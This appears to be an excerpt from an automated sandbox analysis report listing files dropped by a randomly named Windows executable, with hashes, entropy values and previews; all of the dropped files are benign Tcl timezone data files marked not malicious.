                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2430
                                                                                                                                                                                                                              Entropy (8bit):3.942836780611272
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:7fnjazk7e+LxhuHJkvVineTeCTU50x0Y7:7fnjazk7eoEpkvVieTeCTUax0Y7
                                                                                                                                                                                                                              MD5:4547D47E9364ACAFB2A4BEE52D04BFBB
                                                                                                                                                                                                                              SHA1:1E7F964692F81D49AEAF581FE70AD22D4E36226B
                                                                                                                                                                                                                              SHA-256:31F9C3C2F17B3EE4FA6D9EE6A86BF407AC0377DE4D666C65E86CE5AC591F829F
                                                                                                                                                                                                                              SHA-512:7F1D7C80A1BF611D5440EEF9085DA6CDED86B5EF4C2737C105640030E5AA998A0951182E72DC224190A25DA8846CDE856A78EBAA8876AA0B18B1CBCADBB060FF
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Moscow) {.. {-9223372036854775808 9017 0 LMT}.. {-2840149817 9017 0 MMT}.. {-1688265017 9079 0 MMT}.. {-1656819079 12679 1 MST}.. {-1641353479 9079 0 MMT}.. {-1627965079 16279 1 MDST}.. {-1618716679 12679 1 MST}.. {-1596429079 16279 1 MDST}.. {-1593820800 14400 0 MSD}.. {-1589860800 10800 0 MSK}.. {-1542427200 14400 1 MSD}.. {-1539493200 18000 1 +05}.. {-1525323600 14400 1 MSD}.. {-1491188400 7200 0 EET}.. {-1247536800 10800 0 MSD}.. {354920400 14400 1 MSD}.. {370728000 10800 0 MSK}.. {386456400 14400 1 MSD}.. {402264000 10800 0 MSK}.. {417992400 14400 1 MSD}.. {433800000 10800 0 MSK}.. {449614800 14400 1 MSD}.. {465346800 10800 0 MSK}.. {481071600 14400 1 MSD}.. {496796400 10800 0 MSK}.. {512521200 14400 1 MSD}.. {528246000 10800 0 MSK}.. {543970800 14400 1 MSD}.. {559695600 10800 0 MSK}.. {575420400 14400 1 MSD}.. {591145200 10
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):179
                                                                                                                                                                                                                              Entropy (8bit):4.7873368289068905
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq85GKLlXHAIgNwMGKLZRRL/yQatHefeWFKYGKL8n:SlSWB9vsM3yZdL1HAIgGMdLZRN/y3HeA
                                                                                                                                                                                                                              MD5:BE82205480617CF07F76BA0DF06C95BC
                                                                                                                                                                                                                              SHA1:46D2D8D9FE4FB570C2A09BC809B02C8960F9601F
                                                                                                                                                                                                                              SHA-256:FC93B7516933EDFDC211AC0822EE88BF7ACAD1C58A0643B15294F82EB0F14414
                                                                                                                                                                                                                              SHA-512:F490A70053A6011D80FB0A4E96D2871BFEEB168690E21C4EC31F2F5C0E24A67C706528C81322A1D48E71242F0FFA277550192925FDE5B1F34BFCB308290E11FC
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Nicosia)]} {.. LoadTimeZoneFile Asia/Nicosia..}..set TZData(:Europe/Nicosia) $TZData(:Asia/Nicosia)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):179
                                                                                                                                                                                                                              Entropy (8bit):4.910647918749938
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxV/y+YF3vXHAIgoq8yFRRL/yQasWJAQahyuv:SlSWB9vsM3ymhVoPHAIgoh6N/yI7Fv
                                                                                                                                                                                                                              MD5:242748F361AD524CD8E288BEE8611E19
                                                                                                                                                                                                                              SHA1:A636A544BB54851185E2BE83DAC69C813B824827
                                                                                                                                                                                                                              SHA-256:C84E9C0D22059573079211CBF487072CAB95C14B5ECEFB596CF1F594ABD3458C
                                                                                                                                                                                                                              SHA-512:404B272D0C6B70332052601EA65C0F7AE71C12F62D19FD3010BBA6FB25E4F2F95BB9E5F295D8494CBADB1AE9C7F833C42382AE7488317EA6F0C20E60B63BEFE8
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/Berlin)]} {.. LoadTimeZoneFile Europe/Berlin..}..set TZData(:Europe/Oslo) $TZData(:Europe/Berlin)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):9152
                                                                                                                                                                                                                              Entropy (8bit):3.8506895725632746
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:fySTO1C+4qoMYOKDBb0S274elPiIEtzsFpMbFNBwA3ybuNTjrjBDmE0DmiTcoYdi:fdp+3Ss41sFpM5vwA6Efv03TBZLl
                                                                                                                                                                                                                              MD5:9CAF8C5C5AF630E7F782C0480DD786E7
                                                                                                                                                                                                                              SHA1:9FBEF9EEDD8BAFB48B17E3AC388CFEF8DCD10CB0
                                                                                                                                                                                                                              SHA-256:AE61491C4A587F56426A9F2118E31060276F2B0231E750C461781577551CA196
                                                                                                                                                                                                                              SHA-512:F809744BB597184A2815758A27B6A07C515C65DB96CFFB3625FD059DEBBF05EE903E999483B3459C7C8D3991824746F8530CD1378F8A63B1F54F60CFACE9F89B
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Paris) {.. {-9223372036854775808 561 0 LMT}.. {-2486592561 561 0 PMT}.. {-1855958961 0 0 WET}.. {-1689814800 3600 1 WEST}.. {-1680397200 0 0 WET}.. {-1665363600 3600 1 WEST}.. {-1648342800 0 0 WET}.. {-1635123600 3600 1 WEST}.. {-1616893200 0 0 WET}.. {-1604278800 3600 1 WEST}.. {-1585443600 0 0 WET}.. {-1574038800 3600 1 WEST}.. {-1552266000 0 0 WET}.. {-1539997200 3600 1 WEST}.. {-1520557200 0 0 WET}.. {-1507510800 3600 1 WEST}.. {-1490576400 0 0 WET}.. {-1470618000 3600 1 WEST}.. {-1459126800 0 0 WET}.. {-1444006800 3600 1 WEST}.. {-1427677200 0 0 WET}.. {-1411952400 3600 1 WEST}.. {-1396227600 0 0 WET}.. {-1379293200 3600 1 WEST}.. {-1364778000 0 0 WET}.. {-1348448400 3600 1 WEST}.. {-1333328400 0 0 WET}.. {-1316394000 3600 1 WEST}.. {-1301274000 0 0 WET}.. {-1284339600 3600 1 WEST}.. {-1269824400 0 0 WET}.. {-1253494800 3
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):190
                                                                                                                                                                                                                              Entropy (8bit):4.910162937111088
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxV/sUE2tovXHAIgoq8sUE2oAovRL/yQazKIGl1/yQ0:SlSWB9vsM3ymhrE2tSHAIgohrE2LovNK
                                                                                                                                                                                                                              MD5:52C36955D6BD1D9FE9CB64822D04B6DB
                                                                                                                                                                                                                              SHA1:D5FF82EC486409E6FB314AD5ACE608577C9632CF
                                                                                                                                                                                                                              SHA-256:B87630FF459DE07EB16CD0C2452660772E3FFC4EEB8419EA77A013B6F63A5900
                                                                                                                                                                                                                              SHA-512:ABA49D3F05A41A4982600E4DA5C225D8994251F447401EE6FE8478E008BCD5D41C057034185B5CFF805634D571F3CC98EFE98093ABC8E6271351E11A4DA1E7AD
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/Belgrade)]} {.. LoadTimeZoneFile Europe/Belgrade..}..set TZData(:Europe/Podgorica) $TZData(:Europe/Belgrade)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8038
                                                                                                                                                                                                                              Entropy (8bit):3.8240363895915914
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:Kr9+neXAS274elPiIEtzsFpMbFNBwA3ybuNTjrjBDmE0DmiTcoYdNOMCsyZhltlh:KnASs41sFpM5vwA6Efv03TBZLl
                                                                                                                                                                                                                              MD5:828134FA1263FEFA2B06A8B2F075F564
                                                                                                                                                                                                                              SHA1:4B332DE6E0855F8B9517F7098A3FB439671FC349
                                                                                                                                                                                                                              SHA-256:5D3AFED5C1B07C6C6635D6BDEB28A0FB4D11A61F25F26C91227B2254BE5F4AA0
                                                                                                                                                                                                                              SHA-512:9AB1462CDBD7F13F0CECDCCC2D91A85D8C0576B71508F935D26638C25ED023CF8FF4BA4FFDA402B308E6142B135D1B9D88700A519DBE2381E8E945329A5354F7
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Prague) {.. {-9223372036854775808 3464 0 LMT}.. {-3786829064 3464 0 PMT}.. {-2469401864 3600 0 CET}.. {-1693706400 7200 1 CEST}.. {-1680483600 3600 0 CET}.. {-1663455600 7200 1 CEST}.. {-1650150000 3600 0 CET}.. {-1632006000 7200 1 CEST}.. {-1618700400 3600 0 CET}.. {-938905200 7200 1 CEST}.. {-857257200 3600 0 CET}.. {-844556400 7200 1 CEST}.. {-828226800 3600 0 CET}.. {-812502000 7200 1 CEST}.. {-796777200 3600 0 CET}.. {-781052400 7200 1 CEST}.. {-777862800 7200 0 CEST}.. {-765327600 3600 0 CET}.. {-746578800 7200 1 CEST}.. {-733359600 3600 0 CET}.. {-728517600 0 1 GMT}.. {-721260000 0 0 CET}.. {-716425200 7200 1 CEST}.. {-701910000 3600 0 CET}.. {-684975600 7200 1 CEST}.. {-670460400 3600 0 CET}.. {-654217200 7200 1 CEST}.. {-639010800 3600 0 CET}.. {283993200 3600 0 CET}.. {291776400 7200 1 CEST}.. {307501200 3600 0 CET}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7658
                                                                                                                                                                                                                              Entropy (8bit):3.7750218768791806
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:eq+cEpkjXkSV385aNlKkUpvBeRF+iDlKSdkwSMTHkB2vwz59F06Kgr/y/rYjlBK0:ePWjUS7ivBeRF+W35Syrwl9h5j
                                                                                                                                                                                                                              MD5:0D3C919F60081388524BD5DB22E6904B
                                                                                                                                                                                                                              SHA1:6691EAB901C8B57D2F2693120A45A67799D05FCB
                                                                                                                                                                                                                              SHA-256:8B64A42BAFD90F9255CACFDBAC603D638DD7C18DC27249F9C9B515E1DA634424
                                                                                                                                                                                                                              SHA-512:62A2820B8C1C5468AC1F1BB626F9AAAD0BA1DEC5B73740F00FE4DB8CFA3F2BCF9947968E693824FC8770BA20AB962F93F7E5E345AE8A85F99CDB18E2B510308E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Riga) {.. {-9223372036854775808 5794 0 LMT}.. {-2840146594 5794 0 RMT}.. {-1632008194 9394 1 LST}.. {-1618702594 5794 0 RMT}.. {-1601681794 9394 1 LST}.. {-1597275394 5794 0 RMT}.. {-1377308194 7200 0 EET}.. {-928029600 10800 0 MSK}.. {-899521200 3600 0 CET}.. {-857257200 3600 0 CET}.. {-844556400 7200 1 CEST}.. {-828226800 3600 0 CET}.. {-812502000 7200 1 CEST}.. {-796777200 3600 0 CET}.. {-795834000 10800 0 MSD}.. {354920400 14400 1 MSD}.. {370728000 10800 0 MSK}.. {386456400 14400 1 MSD}.. {402264000 10800 0 MSK}.. {417992400 14400 1 MSD}.. {433800000 10800 0 MSK}.. {449614800 14400 1 MSD}.. {465346800 10800 0 MSK}.. {481071600 14400 1 MSD}.. {496796400 10800 0 MSK}.. {512521200 14400 1 MSD}.. {528246000 10800 0 MSK}.. {543970800 14400 1 MSD}.. {559695600 10800 0 MSK}.. {575420400 14400 1 MSD}.. {591145200 10800 0 MSK}.. {6
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8813
                                                                                                                                                                                                                              Entropy (8bit):3.8168470239811736
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:hhGvC2GmkNXEq74elPiIEtzsFpMbFNBwA3ybuNTjrjBDmE0DmiTcoYdNOMCsyZhn:hUsF41sFpM5vwA6Efv03TBZLl
                                                                                                                                                                                                                              MD5:C4F49446D3696301EDB339691DCB2FDB
                                                                                                                                                                                                                              SHA1:537963A77B9BE9BE6B997A812A6E6DD120F6F247
                                                                                                                                                                                                                              SHA-256:DCD2D9144507311E573568598E1FFD0E0574FB677AA0DAFC5641D80A19EB6E58
                                                                                                                                                                                                                              SHA-512:1F0A9A549FA0995C51E90AC392671E3F09744B268F1EE6A27CA7E3C41C2B02A4BA0F98369BE40BA482FBA1FED8F1EE712F0B3217AD86164D1AD498E369C24D76
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Rome) {.. {-9223372036854775808 2996 0 LMT}.. {-3252098996 2996 0 RMT}.. {-2403565200 3600 0 CET}.. {-1690765200 7200 1 CEST}.. {-1680487200 3600 0 CET}.. {-1664758800 7200 1 CEST}.. {-1648951200 3600 0 CET}.. {-1635123600 7200 1 CEST}.. {-1616896800 3600 0 CET}.. {-1604278800 7200 1 CEST}.. {-1585533600 3600 0 CET}.. {-1571014800 7200 1 CEST}.. {-1555293600 3600 0 CET}.. {-932432400 7200 1 CEST}.. {-857257200 3600 0 CET}.. {-844556400 7200 1 CEST}.. {-830307600 7200 0 CEST}.. {-828226800 3600 0 CET}.. {-812502000 7200 1 CEST}.. {-807152400 7200 0 CEST}.. {-798073200 3600 0 CET}.. {-781052400 7200 1 CEST}.. {-766717200 3600 0 CET}.. {-750898800 7200 1 CEST}.. {-733359600 3600 0 CET}.. {-719456400 7200 1 CEST}.. {-701917200 3600 0 CET}.. {-689209200 7200 1 CEST}.. {-670460400 3600 0 CET}.. {-114051600 7200 1 CEST}.. {-103168800 36
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2118
                                                                                                                                                                                                                              Entropy (8bit):3.664269700453612
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:7PvCAs6kKR6aQmF1cSNWrI+AjQnTRYZ/YF0LUdt/LkajuZbIJltiabs2Tb:7HCAs6kC6aZF1cSN4I+AjQTRYZ/YF0Lw
                                                                                                                                                                                                                              MD5:965D987F6576F66A08871697144D4CDB
                                                                                                                                                                                                                              SHA1:AF7226DF81C2B3C3A5832F59FC708A6BCBF389CA
                                                                                                                                                                                                                              SHA-256:8F395352AA05D35E7D13380E73659A0D5B56FFC17E3F4E40E4F678A902F0E49B
                                                                                                                                                                                                                              SHA-512:B82E0CFA5EDA0FCDF03609AE439255F8937A7E9EFA0AFE15EA8877316782AFC74514BCD2B4F06F1B5F0F3C5A64A933D73CB50D5AED2BB1491BD6CACBB77B10E8
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Samara) {.. {-9223372036854775808 12020 0 LMT}.. {-1593820800 10800 0 +03}.. {-1247540400 14400 0 +04}.. {-1102305600 14400 0 +05}.. {354916800 18000 1 +05}.. {370724400 14400 0 +04}.. {386452800 18000 1 +05}.. {402260400 14400 0 +04}.. {417988800 18000 1 +05}.. {433796400 14400 0 +04}.. {449611200 18000 1 +05}.. {465343200 14400 0 +04}.. {481068000 18000 1 +05}.. {496792800 14400 0 +04}.. {512517600 18000 1 +05}.. {528242400 14400 0 +04}.. {543967200 18000 1 +05}.. {559692000 14400 0 +04}.. {575416800 18000 1 +05}.. {591141600 14400 0 +04}.. {606866400 10800 0 +04}.. {606870000 14400 1 +04}.. {622594800 10800 0 +03}.. {638319600 14400 1 +04}.. {654649200 10800 0 +03}.. {670374000 7200 0 +03}.. {670377600 10800 1 +03}.. {686102400 10800 0 +03}.. {687916800 14400 0 +04}.. {701820000 18000 1 +05}.. {717544800 14400 0 +04}.. {733
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):179
                                                                                                                                                                                                                              Entropy (8bit):4.955758257767983
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxVvjF3vXHAIgoqspvVHRL/yQawELDX7x/yQaxE:SlSWB9vsM3ymx5PHAIgoxvN/yt/yrE
                                                                                                                                                                                                                              MD5:D253DA6880630A31D39DB0CFA4933ABD
                                                                                                                                                                                                                              SHA1:E5798DAAE574729685FE489F296B964BC1CCF2E4
                                                                                                                                                                                                                              SHA-256:B6856A0E38C2404F7D5FA1821559503F8AE70923A562F0D993124D131515F395
                                                                                                                                                                                                                              SHA-512:CFB6005F3E8D1C585AF36EB7A8C9F49760EF6F446C97E7804EB61EFD0804424C4FB6AE81B71C5A867274EF89A17DAC0D2A0FF882A0F6AEA1D5FFD51593726C5F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/Rome)]} {.. LoadTimeZoneFile Europe/Rome..}..set TZData(:Europe/San_Marino) $TZData(:Europe/Rome)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):189
                                                                                                                                                                                                                              Entropy (8bit):4.937834327554967
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxV/sUE2tovXHAIgoq8sUE2oAovRL/yQawEX3GEaQa5:SlSWB9vsM3ymhrE2tSHAIgohrE2LovNZ
                                                                                                                                                                                                                              MD5:F7C7DAE9C5D371EF9EE1F490246ED3CC
                                                                                                                                                                                                                              SHA1:40C388FE2A55078C8E0524A4385B3F8846960E24
                                                                                                                                                                                                                              SHA-256:BC00D953C2F3E55E40EDA13838AB66B9E9D0BDAD620E4EB917637761ABB06FB1
                                                                                                                                                                                                                              SHA-512:EB22C59F4D58D96797A718FC59B010795F587626E456D44A3E6398E0FBF4ECD97BCDC151BC1359151798B5AF2964FE5708233F8ECD0D344C3E27629F2645687F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/Belgrade)]} {.. LoadTimeZoneFile Europe/Belgrade..}..set TZData(:Europe/Sarajevo) $TZData(:Europe/Belgrade)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2061
                                                                                                                                                                                                                              Entropy (8bit):3.6638125261109824
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:yFvCAs6kKR6aQmF1cSNWJjXgV/Ap40FjDQ:yhCAs6kC6aZF1cSNcjXgV/ApDFjDQ
                                                                                                                                                                                                                              MD5:CC4D7C478790588D232568CAB12D8E67
                                                                                                                                                                                                                              SHA1:07A7CFCFFFF91D124EDFC99F5053BAFC79FBB12B
                                                                                                                                                                                                                              SHA-256:AB90363DEE5077C39EC55FE8E519593FF08223E5A8E593F6CCE01FB5B8B35BAE
                                                                                                                                                                                                                              SHA-512:23944D20624C942CFDE58F1019160D64401BD0AFB8C3EC49F904038482FAA6741812548C860A2DAE050B8D17A7E08ED9C6EBE7FF19393CFA46D78B1D21B1CACA
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Saratov) {.. {-9223372036854775808 11058 0 LMT}.. {-1593820800 10800 0 +03}.. {-1247540400 14400 0 +05}.. {354916800 18000 1 +05}.. {370724400 14400 0 +04}.. {386452800 18000 1 +05}.. {402260400 14400 0 +04}.. {417988800 18000 1 +05}.. {433796400 14400 0 +04}.. {449611200 18000 1 +05}.. {465343200 14400 0 +04}.. {481068000 18000 1 +05}.. {496792800 14400 0 +04}.. {512517600 18000 1 +05}.. {528242400 14400 0 +04}.. {543967200 18000 1 +05}.. {559692000 14400 0 +04}.. {575416800 10800 0 +04}.. {575420400 14400 1 +04}.. {591145200 10800 0 +03}.. {606870000 14400 1 +04}.. {622594800 10800 0 +03}.. {638319600 14400 1 +04}.. {654649200 10800 0 +03}.. {670374000 14400 0 +04}.. {701820000 10800 0 +04}.. {701823600 14400 1 +04}.. {717548400 10800 0 +03}.. {733273200 14400 1 +04}.. {748998000 10800 0 +03}.. {764722800 14400 1 +04}.. {780
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7549
                                                                                                                                                                                                                              Entropy (8bit):3.76585669030767
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:dUusEpkjXkSV3AMaNlKkUpvBeRF+iDlKSdkwSMTHkB2vwz59F06Kgr/y/rYjlBK0:O0WjUSWivBeRF+W35Syrwl9h5j
                                                                                                                                                                                                                              MD5:54EF0224F5E28FA78F212EC97D4AE561
                                                                                                                                                                                                                              SHA1:FA7C9A951ED943F1E1E609D2253582016BC26B57
                                                                                                                                                                                                                              SHA-256:6F3594CCDA78B02B2EE14C8FAE29E668E47193AF2DFCF5AF1ECD210F13BCE9CE
                                                                                                                                                                                                                              SHA-512:2D1CA2BB1945AE5E3F56AF8FA7F950CE7169F215C783E683634581C5EC01B54159E47A0E9551897077BBEAB06158906029A4E4B0051A263D9E5D903EA9DA1692
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Tallinn) {.. {-9223372036854775808 5940 0 LMT}.. {-2840146740 5940 0 TMT}.. {-1638322740 3600 0 CET}.. {-1632006000 7200 1 CEST}.. {-1618700400 3600 0 CET}.. {-1593824400 5940 0 TMT}.. {-1535938740 7200 0 EET}.. {-927943200 10800 0 MSK}.. {-892954800 3600 0 CET}.. {-857257200 3600 0 CET}.. {-844556400 7200 1 CEST}.. {-828226800 3600 0 CET}.. {-812502000 7200 1 CEST}.. {-797648400 10800 0 MSD}.. {354920400 14400 1 MSD}.. {370728000 10800 0 MSK}.. {386456400 14400 1 MSD}.. {402264000 10800 0 MSK}.. {417992400 14400 1 MSD}.. {433800000 10800 0 MSK}.. {449614800 14400 1 MSD}.. {465346800 10800 0 MSK}.. {481071600 14400 1 MSD}.. {496796400 10800 0 MSK}.. {512521200 14400 1 MSD}.. {528246000 10800 0 MSK}.. {543970800 14400 1 MSD}.. {559695600 10800 0 MSK}.. {575420400 14400 1 MSD}.. {591145200 10800 0 MSK}.. {606870000 10800 1 EEST}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7675
                                                                                                                                                                                                                              Entropy (8bit):3.809498345470167
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:n05NWKIHBJ9AE4elPiIEtzsFpMbFNBwA3ybuNTjrjBDmE0DmiTcoYdNOMCsyZhlt:0iKqxAE41sFpM5vwA6Efv03TBZLl
                                                                                                                                                                                                                              MD5:1983B88075A92942209BB2B80E565F4E
                                                                                                                                                                                                                              SHA1:12A0401026C5C036144FD1D544173AAB39969F61
                                                                                                                                                                                                                              SHA-256:C62686BF598138FEFB72E8CC6632BA75A5FE147F2A30124EE3583BE1F732E38D
                                                                                                                                                                                                                              SHA-512:E95C38FA0A2B526C00B9DCF5CDF53059DECF64B085AA18BE000968DA626561944415D053CF7A5C32BC672085538920CFD67A3A3B627CFD5B1A4C9CEC49AA3F96
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Tirane) {.. {-9223372036854775808 4760 0 LMT}.. {-1767230360 3600 0 CET}.. {-932346000 7200 0 CEST}.. {-857257200 3600 0 CET}.. {-844556400 7200 1 CEST}.. {-843519600 3600 0 CET}.. {136854000 7200 1 CEST}.. {149896800 3600 0 CET}.. {168130800 7200 1 CEST}.. {181432800 3600 0 CET}.. {199839600 7200 1 CEST}.. {213141600 3600 0 CET}.. {231894000 7200 1 CEST}.. {244591200 3600 0 CET}.. {263257200 7200 1 CEST}.. {276040800 3600 0 CET}.. {294706800 7200 1 CEST}.. {307490400 3600 0 CET}.. {326156400 7200 1 CEST}.. {339458400 3600 0 CET}.. {357087600 7200 1 CEST}.. {370389600 3600 0 CET}.. {389142000 7200 1 CEST}.. {402444000 3600 0 CET}.. {419468400 7200 1 CEST}.. {433807200 3600 0 CET}.. {449622000 7200 1 CEST}.. {457480800 7200 0 CEST}.. {465354000 3600 0 CET}.. {481078800 7200 1 CEST}.. {496803600 3600 0 CET}.. {512528400 7200 1 C
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):187
                                                                                                                                                                                                                              Entropy (8bit):4.770127787944403
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqTQGqhyXHAIgObTq0vFvRL/nUDH4QwyFPUDHqNn:SlSWB9vsM3ycmhSHAIgObmSN/BCLNn
                                                                                                                                                                                                                              MD5:BBB00369FA8DCC23A7824EDB964BF48D
                                                                                                                                                                                                                              SHA1:A97E42B3CC45860CC0DFC62F468B24A628B43973
                                                                                                                                                                                                                              SHA-256:AFFB0A5D9CBD5949F2FC5047820FA2A2798F7C303F7BC972EC49CCF27837B00E
                                                                                                                                                                                                                              SHA-512:2D4C8616308522C987437C39C74E250973C2AC7AA1499C60321F42E84CE52C28D1F6AE81E6390B116C92C7B208EA0F211EB3C5A86E6E4CEE0620014DE5359F4F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Pacific/Tarawa)]} {.. LoadTimeZoneFile Pacific/Tarawa..}..set TZData(:Pacific/Funafuti) $TZData(:Pacific/Tarawa)..
